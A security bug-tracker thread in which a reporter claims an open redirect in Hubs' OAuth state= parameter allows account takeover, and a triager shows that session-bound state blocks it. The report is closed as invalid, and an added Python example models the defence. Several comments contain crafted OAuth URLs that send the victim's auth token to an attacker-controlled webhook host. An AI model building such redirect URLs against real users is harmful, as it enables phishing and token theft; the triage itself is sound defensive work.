Closed Bug 1826674 Opened 3 years ago Closed 3 years ago

Account takeover on open redirect state= parameter

Categories

(Websites :: Hubs, defect)

defect

Tracking

(Not tracked)

RESOLVED INVALID

People

(Reporter: verticaldark17, Unassigned)


Details

(Keywords: reporter-external, Whiteboard: [reporter-external] [web-bounty-form] [verif?])

Attachments

(3 files)

Hi team, I found an open redirect vulnerability that can be escalated to account takeover via the state= parameter.

Payload:
I am using an HTTP/Webhook request to get the victim's token:

https://eoawv1snggf7u7g.m.pipedream.net

Steps to Reproduce:

Attached file PoC

Hello Muhammad,

Thank you for your report.

I was able to reproduce the issue. The Hubs dashboard on production is not reachable so I tested on staging.

The URL used for authentication is:

https://accounts.stage.mozaws.net/oauth/?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=<state>%3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net

Replace the Hubs domain with the attacker's server:

https://accounts.stage.mozaws.net/oauth/?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=<state>%3Afxa%3Ahttps%3A%2F%2F<attacker-controlled-url>

You will be redirected to:
https://<attacker-controlled-url>/?_turkeyauthtoken=<generated token>

However, the state parameter has to be valid: when I use the state parameter in a different browser or in a private tab, I get a Not Authorized error. The attack depends on having the victim click on a phishing link which replaces the Hubs domain with the attacker-controlled domain, but the attacker needs a valid state parameter. How will the attacker generate a valid state parameter to include in the phishing link?

I believe this is an issue in how Hubs integrates with Firefox Accounts (FxA), not a problem in FxA. Were you able to reproduce the problem for other products which rely on FxA for authentication?

Thanks,
Frida

Status: UNCONFIRMED → NEW
Type: task → defect
Component: Other → Hubs
Ever confirmed: true

The spec has more details on the state parameter: https://www.rfc-editor.org/rfc/rfc6819#section-3.6, which mentions that the state parameter protects against this type of attack, since the parameter is bound to a specific client.

(In reply to Frida K [:frida] from comment #2)
> Hello Muhammad,
>
> Thank you for your report.
>
> I was able to reproduce the issue. The Hubs dashboard on production is not reachable so I tested on staging.
>
> The URL used for authentication is:
>
> https://accounts.stage.mozaws.net/oauth/?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=<state>%3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net
>
> replace the hubs domain with the attackers server:
>
> https://accounts.stage.mozaws.net/oauth/?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=<state>%3Afxa%3Ahttps%3A%2F%2F<attacker-controlled-url>
>
> you will be redirected to:
> https://<attacker-controlled-url>/?_turkeyauthtoken=<generated token>
>
> However, the state parameter has to be valid, when I use the state parameter on a different browser or in a private tab, I get Not Authorized error. The attack depends on having the victim click on a phishing link which replaces the hubs domain with the attacker controlled domain, but the attacker needs a valid state parameter. How will the attack generate a valid state parameter to include in the phishing link?
>
> I believe this is an issue in how Hubs integrates with Firefox accounts (FxA), not a problem in FxA, were you able to reproduce the problem for other products which rely on Fxa for authentication?
>
> Thanks,
> Frida

Thank you for your answer.

However, in the video I attached it is the Firefox browser and Chrome, and I have also used the Opera browser and the OPPO mobile's default browser, and all of them can reproduce.

And I have tried on several other products, and the result is that their state= parameter has been encrypted.
Take a look at getpocket:

https://accounts.firefox.com/oauth/?client_id=749818d3f2e7857f&state=6ddf950b40bfe13cbf8efeb5450d49e9&scope=profile%3Auid%2Bprofile%3Aemail%2Bprofile%3Adisplay_name&action=signin&s=pocket

State parameters are encrypted and cannot be modified by an attacker.

Here I think that the error lies in the misconfiguration of the unencrypted state parameter in this case.

I am not able to reproduce the issue when generating the state parameter on one browser and trying to get a victim to login on another browser, as you can see in the screenshot.

can you try with this URL generated on my browser: https://accounts.stage.mozaws.net/oauth/signin?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=4b7d79591499c168dd3138193fc4ad71%3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net

Thanks,
Frida

Attached image not-authorized-error

(In reply to Frida K [:frida] from comment #5)
> I am not able to reproduce the issue when generating the state parameter on one browser and trying to get a victim to login on another browser, as you can see in the screenshot.
>
> can you try with this URL generated on my browser: https://accounts.stage.mozaws.net/oauth/signin?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=4b7d79591499c168dd3138193fc4ad71%3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net
>
> Thanks,
> Frida

Hi, I want to confirm this.
I also get an Unauthorized error.

It looks like this state parameter only passes to external domains, not allowing JavaScript redirects.

But I'm still confused by the description above: why is this URL I found passed to an external site, but when you try to test it on staging it gets a Not Authorized error?

Can you log into the victim's account using the token?

Flags: needinfo?(fkiriakos)

(In reply to Frida K [:frida] from comment #5)
> I am not able to reproduce the issue when generating the state parameter on one browser and trying to get a victim to login on another browser, as you can see in the screenshot.
>
> can you try with this URL generated on my browser: https://accounts.stage.mozaws.net/oauth/signin?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=4b7d79591499c168dd3138193fc4ad71%3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net
>
> Thanks,
> Frida

Hi, after I noticed and tried, I found something. Please try logging in with this URL you posted before:

https://accounts.stage.mozaws.net/oauth/signin?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=4b7d79591499c168dd3138193% c47ad1%c47ad1%c47ad1% 3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net

If you use "dashboard.dev.myhubs.net" you will also get an Unauthorized error.

Is there an error in the staging test?

I don't think there is a problem with the staging server, this is how the application is supposed to work. I am still not able to access the production instance, I will check with the team if there is a problem there. I will test on production when I get the chance.

If you were able to generate the token for the victim, then you can login, we confirmed that. However, for the attack to be successful, you need to trick the users into authenticating so that you can get their authentication token, and this part is not possible because of the state parameter.

Flags: needinfo?(fkiriakos)

I just tried testing on production and I get the same error. I think the state parameter is serving its purpose and protecting against this attack.

I just need to submit the URL below to get the victim's token:

https://accounts.firefox.com/oauth/signin?client_id=34bc0d0a6add7329&entrypoint=auth.myhubs.dev&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=89d2f3f041a7f8210e7cd3904536 3A%2F%2Fhttps://eoawv1snggf7u7g.m.pipedream.net/

When the victim is redirected to eoawv1snggf7u7g.m.pipedream.net, I get a parameter containing the victim's token and I can do a takeover there.

I just tried the URL you posted in comment 17 and comment 18, and I got Not Authorized error.

Logging in with the victim's account only works if you use the state parameter you generated in a client then try to login with this URL on the same client.

For an account takeover scenario, the below should happen:

  1. generate the oauth url which has the attacker's controlled domain in the attacker's client
  2. trick the user into clicking the url and logging in with their Firefox account.
  3. receive the authtoken generated for the user on the attacker's end.

In Hubs case, the second step is not working because the state parameter generated on the attacker's client is not valid on the victim's client, therefore, we are getting the Not Authorized error.
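As an added illustration of the three-step scenario above (example code, not Hubs or FxA code), the Python below models the client side of the flow: a state minted in one session, and the callback check that accepts it only in that same session. The "<random>:fxa:<return url>" state layout and the `_turkeyauthtoken` parameter are taken from the URLs quoted in this bug; the in-memory session dict, the function names, the `attacker.example` host and the optional return-host allowlist are assumptions of this example. The allowlist is extra hardening the example adds; the thread only establishes that the state binding alone blocks the phishing step.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed for this example. State layout and the _turkeyauthtoken parameter come
# from the URLs in this bug; the session store, ALLOWED_RETURN_HOSTS and the function
# names are assumptions of the example, not Hubs or FxA code.
AUTHORIZE_ENDPOINT = "https://accounts.stage.mozaws.net/oauth/"
ALLOWED_RETURN_HOSTS = {"dashboard.dev.myhubs.net"}  # assumed allowlist, not in the original
HUBS_RETURN_URL = "https://dashboard.dev.myhubs.net"


def start_login(session: dict, return_url: str) -> str:
    """Mint a fresh state, bind it to the caller's session and build the authorize URL."""
    nonce = secrets.token_hex(16)
    session["oauth_state"] = nonce  # this binding is what makes a copied state useless elsewhere
    params = {
        "client_id": "2db93e6523561502",
        "entrypoint": "auth.dev.myhubs.net",
        "scope": "profile openid https://identity.mozilla.com/account/subscriptions",
        "state": f"{nonce}:fxa:{return_url}",
    }
    return AUTHORIZE_ENDPOINT + "?" + urlencode(params)


def parse_state(state: str):
    """Split "<nonce>:fxa:<return url>"; None if the separator is missing."""
    nonce, sep, return_url = state.partition(":fxa:")
    return (nonce, return_url) if sep else None


def handle_callback(session: dict, state: str, token: str, enforce_allowlist: bool = False):
    """Validate the returned state against the session, then redirect with the token.

    enforce_allowlist=True adds a return-host check on top of the state binding; this is
    extra hardening assumed by the example, not something the bug says Hubs does.
    """
    parsed = parse_state(state)
    if parsed is None:
        return ("error", "Not Authorized")
    nonce, return_url = parsed
    expected = session.get("oauth_state")
    if expected is None or not hmac.compare_digest(nonce, expected):
        return ("error", "Not Authorized")  # state was minted in a different client
    session.pop("oauth_state")  # single use: a replay in the same client also fails
    if enforce_allowlist and urlparse(return_url).hostname not in ALLOWED_RETURN_HOSTS:
        return ("error", "Not Authorized")
    return ("redirect", f"{return_url}/?_turkeyauthtoken={token}")


def _state_from(url: str) -> str:
    return parse_qs(urlparse(url).query)["state"][0]


def _tampered_state(session: dict) -> str:
    """Step 1 of the scenario: mint a state in the attacker's client, swap in the attacker's host."""
    nonce, _ = parse_state(_state_from(start_login(session, HUBS_RETURN_URL)))
    return f"{nonce}:fxa:https://attacker.example"


def legitimate_flow():
    """The victim starts and completes the login in the same browser."""
    victim = {}
    state = _state_from(start_login(victim, HUBS_RETURN_URL))
    return handle_callback(victim, state, "tok")


def same_client_tamper():
    """The case reproduced on staging: the swapped host works, but only in the client that minted the state."""
    attacker = {}
    return handle_callback(attacker, _tampered_state(attacker), "tok")


def cross_client_phish():
    """Step 2 of the scenario: the victim's client never stored the attacker's nonce, so it is rejected."""
    attacker, victim = {}, {}
    return handle_callback(victim, _tampered_state(attacker), "tok")


def same_client_tamper_with_allowlist():
    """With the assumed allowlist, even the self-redirect to a foreign host is refused."""
    attacker = {}
    return handle_callback(attacker, _tampered_state(attacker), "tok", enforce_allowlist=True)
```

`cross_client_phish()` is the step the thread found impossible: the nonce lives in the attacker's session only, so the victim's client answers Not Authorized no matter which host is spliced into the state. `same_client_tamper()` reproduces what was observed on staging, and the allowlist variant shows one way to remove even that self-redirect if the return URL ever has to be carried inside state.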

I see, sorry, I'm not paying enough attention to this. After I searched correctly according to your opinion.

To make sure I understood your comment correctly, do you agree that the account takeover is not actually possible because of the state parameter?

Thanks,
Frida

I'm not saying that account takeover is not possible; currently account takeover is possible by an attacker on his account, but it is not possible to attack someone.

But I think in the future it will be dangerous if this continues.

I am glad we were able to come to an agreement. I believe that we are implementing the necessary mitigations against this risk, therefore, I am closing this report as invalid.

Thanks again for your report.

Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → INVALID
Group: websites-security